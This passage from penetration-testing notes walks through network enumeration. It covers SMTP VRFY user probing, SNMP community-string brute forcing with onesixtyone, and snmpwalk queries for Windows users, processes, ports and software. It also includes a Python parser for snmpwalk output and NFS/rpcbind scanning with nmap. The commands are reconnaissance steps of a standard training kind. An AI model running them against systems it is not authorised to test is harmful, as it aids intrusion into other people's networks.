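            self.outbox += f"252 2.0.0 {arg}\r\n".encode()
        elif verb == "VRFY":
            self.outbox += (f"550 5.1.1 <{arg}>: Recipient address rejected: "
                            "User unknown in local recipient table\r\n").encode()
        elif verb == "QUIT":
            self.outbox += b"221 2.0.0 Bye\r\n"
        else:
            self.outbox += b"502 5.5.2 Error: command not recognized\r\n"

    def recv(self, n):
        out, self.outbox = self.outbox[:n], self.outbox[n:]
        return out


if __name__ == "__main__":
    print(vrfy_users(FakeSMTPSocket(), ["root", "idontexist"]))
    # Live target from the notes: vrfy_over_network("10.10.1.217", ["root", "www-data"])
```

Reading whole replies rather than a fixed recv(1024) matters against real MTAs: a multi-line EHLO/HELO reply or a slow 220 banner otherwise leaves bytes in the buffer that get misread as the answer to the next VRFY.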

9.5. SNMP Enumeration

9.5.1. Nmap

Scan SNMP port UDP 161 using Nmap:

  sudo nmap -sU --open -p 161 10.10.1.1-254 -oG open-snmp.txt

9.5.2. onesixtyone

onesixtyone is an SNMP scanner that discovers devices responding to well-known community names, or mounts a dictionary attack against one or more SNMP devices.

To brute force a list of community names, lets build a word list of community names:

  echo public > community.txt
  echo private >> community.txt
  echo manager >> community.txt

Then run onesixtyone with the community list against the hosts listed in ips.txt:

  onesixtyone -c community.txt -i ips.txt

or against a single host:

  onesixtyone -c community.txt 10.10.1.14

9.5.3. snmpwalk

Enumerate the entire MIB tree of a Windows system that exposes the SNMP port:

  snmpwalk -c public -v1 -t 10 10.10.1.14
  • -c: specifies the community string.
  • -v: specifies the SNMP version number.
  • -t: increases the timeout period to 10 seconds.

Enumerating Windows users:

  snmpwalk -c public -v1 10.10.1.14 1.3.6.1.4.1.77.1.2.25

Enumerating running Windows processes

  snmpwalk -c public -v1 10.10.1.73 1.3.6.1.2.1.25.4.2.1.2

Enumerating open TCP Ports

  snmpwalk -c public -v1 10.10.1.14 1.3.6.1.2.1.6.13.1.3

Enumerating installed software

  snmpwalk -c public -v1 10.10.1.50 1.3.6.1.2.1.25.6.3.1.2

Enumerate all MIBs:

  snmpbulkwalk -c public -v2c 10.10.1.50 .
  • -c Community string.
  • -v2c SNMP version.
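
An added example (not from the original notes) that parses raw snmpwalk output for the OIDs above and decodes what each index carries: the user table is indexed by the OID-encoded user name (length, then one sub-identifier per byte), the process table by PID, and tcpConnLocalPort by local address, local port, remote address and remote port, so listening sockets are the rows with a zero remote end. SAMPLE is constructed to look like the numeric form snmpwalk prints when no MIBs are loaded.

```python
import re

# Numeric OID prefixes from the snmpwalk commands above and what indexes them
OID_KINDS = {
    "1.3.6.1.4.1.77.1.2.25.1.1": "user",       # LanMgr svUserName, index = OID-encoded name
    "1.3.6.1.2.1.25.4.2.1.2": "process",       # hrSWRunName, index = PID
    "1.3.6.1.2.1.6.13.1.3": "tcp_local_port",  # tcpConnLocalPort, index = laddr.lport.raddr.rport
    "1.3.6.1.2.1.25.6.3.1.2": "software",      # hrSWInstalledName, index = row number
}

LINE_RE = re.compile(r"^(?P<oid>\S+)\s*=\s*(?:(?P<type>[A-Za-z0-9-]+):\s*)?(?P<value>.*)$")


def normalise_oid(oid):
    """snmpwalk prints 'iso.3.6...' without MIBs and '.1.3.6...' with -On."""
    oid = oid.strip().lstrip(".")
    return "1." + oid[4:] if oid.startswith("iso.") else oid


def decode_index_string(suffix):
    """Decode a string used as a table index: '<len>.<byte>.<byte>...'."""
    parts = [int(p) for p in suffix.split(".")]
    length, chars = parts[0], parts[1:]
    if length != len(chars):
        raise ValueError(f"index length {length} does not match {len(chars)} bytes")
    return bytes(chars).decode("latin-1")


def parse_line(line):
    """Split one output line into (numeric oid, type, unquoted value)."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    value = m.group("value").strip()
    if len(value) >= 2 and value[0] == value[-1] == '"':
        value = value[1:-1]
    return normalise_oid(m.group("oid")), m.group("type") or "", value


def summarise(lines):
    """Group a walk's rows into users, processes, listening TCP ports and software."""
    out = {"users": [], "processes": {}, "listening_tcp": [], "software": []}
    for line in lines:
        parsed = parse_line(line)
        if not parsed:
            continue
        oid, _type, value = parsed
        for prefix, kind in OID_KINDS.items():
            if not oid.startswith(prefix + "."):
                continue
            suffix = oid[len(prefix) + 1:]
            if kind == "user":
                # the index spells the same name, which recovers it even when the
                # value was printed as Hex-STRING or left empty
                out["users"].append(value or decode_index_string(suffix))
            elif kind == "process":
                out["processes"][int(suffix)] = value
            elif kind == "tcp_local_port":
                idx = [int(p) for p in suffix.split(".")]
                local_port, remote = idx[4], idx[5:10]
                if remote == [0, 0, 0, 0, 0]:       # no peer: a listening socket
                    out["listening_tcp"].append(local_port)
            elif kind == "software":
                out["software"].append(value)
    return out


# Constructed sample in the numeric format snmpwalk uses without MIBs loaded
SAMPLE = """\
iso.3.6.1.4.1.77.1.2.25.1.1.5.71.117.101.115.116 = STRING: "Guest"
iso.3.6.1.4.1.77.1.2.25.1.1.13.65.100.109.105.110.105.115.116.114.97.116.111.114 = STRING: "Administrator"
iso.3.6.1.2.1.25.4.2.1.2.4 = STRING: "System"
iso.3.6.1.2.1.25.4.2.1.2.1372 = STRING: "snmp.exe"
iso.3.6.1.2.1.6.13.1.3.0.0.0.0.135.0.0.0.0.0 = INTEGER: 135
iso.3.6.1.2.1.6.13.1.3.0.0.0.0.445.0.0.0.0.0 = INTEGER: 445
iso.3.6.1.2.1.6.13.1.3.10.10.1.14.49158.10.10.1.5.4444 = INTEGER: 49158
iso.3.6.1.2.1.25.6.3.1.2.1 = STRING: "Microsoft Visual C++ 2015 Redistributable"
"""

if __name__ == "__main__":
    # Real use: summarise(open("walk.txt").read().splitlines())
    print(summarise(SAMPLE.splitlines()))
```

The tcpConnTable caveat is the point worth remembering: the port OID alone mixes listeners with established connections, and port 49158 above is an outbound connection, not a service.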

Query the extension MIB (NET-SNMP-EXTEND-MIB), through which a net-snmp agent exposes to SNMP clients the output of commands configured with "extend" in snmpd.conf:

  snmpbulkwalk -c public -v2c 192.168.213.156 NET-SNMP-EXTEND-MIB::nsExtendOutputFull

9.6. NFS Enumeration

Portmapper (rpcbind), which runs on port 111 (TCP and UDP), maps RPC services to the ports on which they listen.

RPC processes notify rpcbind when they start, registering the ports they are listening on and the RPC program numbers they expect to serve.

The client system then contacts rpcbind on the server with a particular RPC program number. The rpcbind service redirects the client to the proper port number (often TCP port 2049 for NFS) so it can communicate with the requested service.

Scan the ports with Nmap:

  nmap -v -p 111 10.10.1.1-254

Nmap script rpcinfo to find services mapped to rpcbind:

  nmap -sV -p 111 --script=rpcinfo 10.10.1.1-254

Once an NFS share is found (NFS itself listens on TCP 2049 by default), use the Nmap scripts nfs-ls, nfs-showmount and nfs-statfs; quote the wildcard so the shell does not expand it:

  nmap -p 111 --script "nfs*" 10.10.1.72

10. Miscellaneous

10.1. Pdftotext

Converts PDF files to plain text.

10.2. AWK

Extract content delimited by multiple spaces:

  awk -F '  +' '{print $1}'

11. Footnotes


1

Mscache is also referenced as Domain Cached Credentials or DCC2 or DCC. The purpose of mscache is for users to still be able to login to their Windows box in the case it cannot reach the domain controller: